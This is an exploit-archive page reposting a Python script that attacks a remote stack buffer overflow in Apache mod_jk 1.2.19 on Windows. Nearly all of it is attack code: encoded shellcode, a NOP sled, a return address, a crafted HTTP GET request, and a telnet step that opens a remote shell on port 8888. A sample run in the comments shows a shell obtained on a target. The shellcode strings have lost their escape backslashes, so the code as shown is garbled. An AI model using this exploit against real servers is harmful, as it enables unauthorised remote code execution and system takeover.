[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
# Published : 2008-07-18
# Author : Unohope
# Previous Title : IntelliTamper 2.07 (server header) Remote Code Execution Exploit
# Next Title : Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit 


#!/usr/bin/python
#
#   _____ _   _ _____  _____ _____ _____
#  /  ___| |_| |  _  |  _  |  _  |_   _|
#  | (___|  _  | [_)_/| (_) | (_) | | |
#  _____|_| |_|_| |_||_____|_____| |_|
#         C. H. R. O. O. T.  SECURITY  GROUP
#         - -- ----- --- -- -- ---- --- -- -
#                      http://www.chroot.org
#
#                          _   _ _ _____ ____ ____ __  _ 
#        Hacks In Taiwan  | |_| | |_   _|  __|    |  | |
#        Conference 2008  |  _  | | | | | (__| () |     |
#                         |_| |_|_| |_| ____|____|_|__|
#                                      http://www.hitcon.org
#
#
#  Title =======:: Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit
#
#  Author ======:: unohope [at] chroot [dot] org
#
#  IRC =========:: irc.chroot.org #chroot
#
#  ScriptName ==:: Apache Module mod_jk/1.2.19
#
#  Vendor ======:: http://tomcat.apache.org/
#
#  Download ====:: http://archive.apache.org/dist/tomcat/tomcat-connectors/jk/binaries/win32/
#
#  Tested on ===:: Apache/2.0.58 (Win32) mod_jk/1.2.19
#                  Apache/2.0.59 (Win32) mod_jk/1.2.19
#
#  Greets ======:: zha0
#
#
#  [root@wargame tmp]# ./apx-jk_mod-1.2.19
#  Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
#
#  usage: ./apx-jk_mod-1.2.19 <host>
#
#  [root@wargame tmp]# ./apx-jk_mod-1.2.19 192.168.1.78
#  Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
#
#    [+] connecting to 192.168.1.78 ...
#
#  Trying 192.168.1.78...
#  Connected to 192.168.1.78.
#  Escape character is '^]'.
#  Microsoft Windows XP [.. 5.1.2600]
#  (C) Copyright 1985-2001 Microsoft Corp.
#
#  C:AppServApache2>
#
#

import os, sys, time
from socket import *

shellcode  = "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
shellcode += "x49x49x49x49x49x49x49x49x49x37x49x49x51x5ax6ax68"
shellcode += "x58x30x41x31x50x42x41x6bx42x41x78x42x32x42x41x32"
shellcode += "x41x41x30x41x41x58x38x42x42x50x75x4bx59x49x6cx43"
shellcode += "x5ax7ax4bx32x6dx5ax48x5ax59x69x6fx4bx4fx39x6fx71"
shellcode += "x70x6ex6bx62x4cx44x64x71x34x4cx4bx62x65x75x6cx4c"
shellcode += "x4bx63x4cx76x65x70x78x35x51x48x6fx6cx4bx50x4fx74"
shellcode += "x58x6ex6bx33x6fx55x70x37x71x48x6bx57x39x6cx4bx66"
shellcode += "x54x6ex6bx46x61x7ax4ex47x41x6bx70x7ax39x4cx6cx4c"
shellcode += "x44x6fx30x62x54x44x47x38x41x4bx7ax54x4dx44x41x4b"
shellcode += "x72x78x6bx39x64x35x6bx53x64x75x74x46x48x72x55x79"
shellcode += "x75x6cx4bx53x6fx76x44x44x41x48x6bx35x36x4ex6bx54"
shellcode += "x4cx30x4bx6cx4bx51x4fx65x4cx65x51x38x6bx77x73x36"
shellcode += "x4cx4ex6bx6ex69x30x6cx66x44x45x4cx30x61x69x53x30"
shellcode += "x31x79x4bx43x54x6cx4bx63x73x44x70x4ex6bx77x30x66"
shellcode += "x6cx6cx4bx72x50x45x4cx4cx6dx4ex6bx73x70x64x48x73"
shellcode += "x6ex55x38x6ex6ex32x6ex34x4ex58x6cx62x70x39x6fx6b"
shellcode += "x66x70x66x61x43x52x46x71x78x30x33x55x62x63x58x63"
shellcode += "x47x34x33x65x62x41x4fx30x54x39x6fx4ax70x52x48x5a"
shellcode += "x6bx38x6dx6bx4cx75x6bx30x50x6bx4fx6ex36x53x6fx6f"
shellcode += "x79x4ax45x32x46x6fx71x6ax4dx34x48x77x72x73x65x73"
shellcode += "x5ax37x72x69x6fx58x50x52x48x4ex39x76x69x4ax55x4c"
shellcode += "x6dx32x77x69x6fx59x46x50x53x43x63x41x43x70x53x70"
shellcode += "x53x43x73x50x53x62x63x70x53x79x6fx6ax70x35x36x61"
shellcode += "x78x71x32x78x38x71x76x30x53x4bx39x69x71x4dx45x33"
shellcode += "x58x6cx64x47x6ax74x30x5ax67x43x67x79x6fx39x46x32"
shellcode += "x4ax56x70x66x31x76x35x59x6fx58x50x32x48x4dx74x4e"
shellcode += "x4dx66x4ex7ax49x50x57x6bx4fx6ex36x46x33x56x35x39"
shellcode += "x6fx78x50x33x58x6bx55x51x59x4ex66x50x49x51x47x39"
shellcode += "x6fx48x56x32x70x32x74x62x74x46x35x4bx4fx38x50x6e"
shellcode += "x73x55x38x4dx37x71x69x69x56x71x69x61x47x6bx4fx6e"
shellcode += "x36x36x35x79x6fx6ax70x55x36x31x7ax71x74x32x46x51"
shellcode += "x78x52x43x70x6dx4fx79x4dx35x72x4ax66x30x42x79x64"
shellcode += "x69x7ax6cx4bx39x48x67x62x4ax57x34x4fx79x6dx32x37"
shellcode += "x41x6bx70x7ax53x6ex4ax69x6ex32x62x46x4dx6bx4ex70"
shellcode += "x42x44x6cx4cx53x6ex6dx31x6ax64x78x4cx6bx4ex4bx4e"
shellcode += "x4bx43x58x70x72x69x6ex6dx63x37x66x79x6fx63x45x73"
shellcode += "x74x4bx4fx7ax76x63x6bx31x47x72x72x41x41x50x51x61"
shellcode += "x41x70x6ax63x31x41x41x46x31x71x45x51x41x4bx4fx78"
shellcode += "x50x52x48x4cx6dx79x49x54x45x38x4ex53x63x6bx4fx6e"
shellcode += "x36x30x6ax49x6fx6bx4fx70x37x4bx4fx4ex30x4ex6bx30"
shellcode += "x57x69x6cx6bx33x4bx74x62x44x79x6fx6bx66x66x32x6b"
shellcode += "x4fx4ex30x53x58x58x70x4ex6ax55x54x41x4fx52x73x4b"
shellcode += "x4fx69x46x4bx4fx6ex30x68";

foo_base = 8
buf_base = 4087
buf_offset = foo_base * 11
nop = "x90"
ret = "xccx2axd9x77"
buf = nop*foo_base + shellcode + nop*(buf_base - foo_base - len(shellcode) - buf_offset) + ret
buf += "x90x90xb0x53x6bxC0x28x03xd8xffxd3" + nop*(buf_offset - foo_base - 3)

def usage():
  print 'usage: %s <host>n' % sys.argv[0]
  sys.exit(-1)

def xpl():
  try:
    print len(buf)
    sockaddr = (host, 80)
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(sockaddr)
    payload = buf + 'HTTP/1.0rnHost: %srnrn' % host
    s.send('GET /' + payload)
    s.close()
    print '  [+] connecting to %s ...n' % host
    time.sleep(3)
    os.system("telnet %s 8888" % host)
  except:
    print '  [-] EXPLOIT FAILED!n'

if __name__ == '__main__':
  print 'Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope [at] chroot.org)n'
  try:
    host = sys.argv[1]
  except IndexError:
    usage()
  xpl()


# [NOTE]
#
# !! This is just for educational purposes, DO NOT use for illegal. !!
#

# www.Syue.com [2008-07-18]